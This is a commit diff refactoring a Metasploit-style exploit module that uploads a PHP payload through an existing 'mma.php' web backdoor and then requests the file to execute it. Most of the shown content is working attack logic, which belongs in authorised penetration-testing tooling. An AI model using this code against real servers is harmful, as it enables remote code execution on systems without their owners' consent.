Update mma_backdoor_upload.rb

shipcod3 · shipcod3 · commit f461c4682bb3 · 2015-10-24T11:15:26.000+08:00
diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb
@@ -64,14 +64,14 @@ def check
 
   def exploit
     uri = normalize_uri(target_uri.path)
-    @payload_name = "#{rand_text_alpha(5)}.php"
+    payload_name = "#{rand_text_alpha(5)}.php"
 
-    print_status("#{peer} - Trying to upload #{@payload_name} to mma.php Backdoor")
+    print_status("#{peer} - Trying to upload #{payload_name} to mma.php Backdoor")
 
     data = Rex::MIME::Message.new
 
     data.add_part('Upload', nil, nil, 'form-data; name="_upl"')
-    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{@payload_name}\"")
+    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{payload_name}\"")
     post_data = data.to_s
 
     res = send_request_cgi({
@@ -83,17 +83,17 @@ def exploit
 
     if res
       if res.body =~ /uplod d0n3 in SAME file/
-        print_good("#{peer} - Our payload #{@payload_name} has been uploaded. Calling payload...")
-        register_files_for_cleanup(@payload_name)
+        print_good("#{peer} - Our payload #{payload_name} has been uploaded. Calling payload...")
+        register_files_for_cleanup(payload_name)
       else
         fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
     else
       fail_with(Failure::Unknown, 'ERROR')
     end
 
-    res = send_request_cgi({
-      'uri'    => normalize_uri(@payload_name),
+    send_request_cgi({
+      'uri'    => normalize_uri(payload_name),
       'method' => 'GET'
     })
   end
